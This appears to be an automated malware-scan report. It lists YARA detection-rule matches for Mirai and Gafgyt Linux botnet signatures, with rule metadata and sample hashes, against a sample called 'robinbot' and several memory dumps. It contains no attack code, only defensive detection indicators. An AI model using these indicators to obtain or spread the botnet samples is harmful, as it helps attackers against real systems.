Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_6a77af0f Author: unknown
Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_0bce98a2 Author: unknown
Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_95e0056c Author: unknown
Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d0c57a2e Author: unknown
Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_6a77af0f Author: unknown
Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_0bce98a2 Author: unknown
Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_95e0056c Author: unknown
Source: 9446.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d0c57a2e Author: unknown
Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_6a77af0f Author: unknown
Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_0bce98a2 Author: unknown
Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_95e0056c Author: unknown
Source: 9451.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown

Source: robinbot, type: SAMPLE	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: robinbot, type: SAMPLE	Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: robinbot, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
Source: robinbot, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
Source: robinbot, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
Source: robinbot, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
Source: robinbot, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_d0c57a2e os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ee7d3a33575ed3aa7431489a8fb18bf30cfd5d6c776066ab2a27f93303124b6, id = d0c57a2e-c10c-436c-be13-50a269326cf2, last_modified = 2021-09-16
Source: robinbot, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
Source: robinbot, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
Source: robinbot, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
Source: robinbot, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
Source: robinbot, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_6a77af0f os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016, id = 6a77af0f-31fa-4793-82aa-10b065ba1ec0, last_modified = 2021-09-16
Source: robinbot, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_0bce98a2 reference_sample = 1b20df8df7f84ad29d81ccbe276f49a6488c2214077b13da858656c027531c80, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 993d0d2e24152d0fb72cc5d5add395bed26671c3935f73386341398b91cb0e6e, id = 0bce98a2-113e-41e1-95c9-9e1852b26142, last_modified = 2021-09-16
Source: robinbot, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_95e0056c reference_sample = 45f67d4c18abc1bad9a9cc6305983abf3234cd955d2177f1a72c146ced50a380, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a2550fdd2625f85050cfe53159858207a79e8337412872aaa7b4627b13cb6c94, id = 95e0056c-bc07-42cf-89ab-6c0cde3ccc8a, last_modified = 2021-09-16
Source: robinbot, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d0c57a2e os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ee7d3a33575ed3aa7431489a8fb18bf30cfd5d6c776066ab2a27f93303124b6, id = d0c57a2e-c10c-436c-be13-50a269326cf2, last_modified = 2021-09-16
Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_6a77af0f os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016, id = 6a77af0f-31fa-4793-82aa-10b065ba1ec0, last_modified = 2021-09-16
Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_0bce98a2 reference_sample = 1b20df8df7f84ad29d81ccbe276f49a6488c2214077b13da858656c027531c80, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 993d0d2e24152d0fb72cc5d5add395bed26671c3935f73386341398b91cb0e6e, id = 0bce98a2-113e-41e1-95c9-9e1852b26142, last_modified = 2021-09-16
Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_95e0056c reference_sample = 45f67d4c18abc1bad9a9cc6305983abf3234cd955d2177f1a72c146ced50a380, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a2550fdd2625f85050cfe53159858207a79e8337412872aaa7b4627b13cb6c94, id = 95e0056c-bc07-42cf-89ab-6c0cde3ccc8a, last_modified = 2021-09-16
Source: 9449.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_d0c57a2e os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ee7d3a33575ed3aa7431489a8fb18bf30cfd5d6c776066ab2a27f93303124b6, id = d0c57a2e-c10c-436c-be13-50a269326cf2, last_modified = 2021-09-16
Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_6a77af0f os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016, id = 6a77af0f-31fa-4793-82aa-10b065ba1ec0, last_modified = 2021-09-16
Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_0bce98a2 reference_sample = 1b20df8df7f84ad29d81ccbe276f49a6488c2214077b13da858656c027531c80, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 993d0d2e24152d0fb72cc5d5add395bed26671c3935f73386341398b91cb0e6e, id = 0bce98a2-113e-41e1-95c9-9e1852b26142, last_modified = 2021-09-16
Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_95e0056c reference_sample = 45f67d4c18abc1bad9a9cc6305983abf3234cd955d2177f1a72c146ced50a380, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a2550fdd2625f85050cfe53159858207a79e8337412872aaa7b4627b13cb6c94, id = 95e0056c-bc07-42cf-89ab-6c0cde3ccc8a, last_modified = 2021-09-16
Source: 9448.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
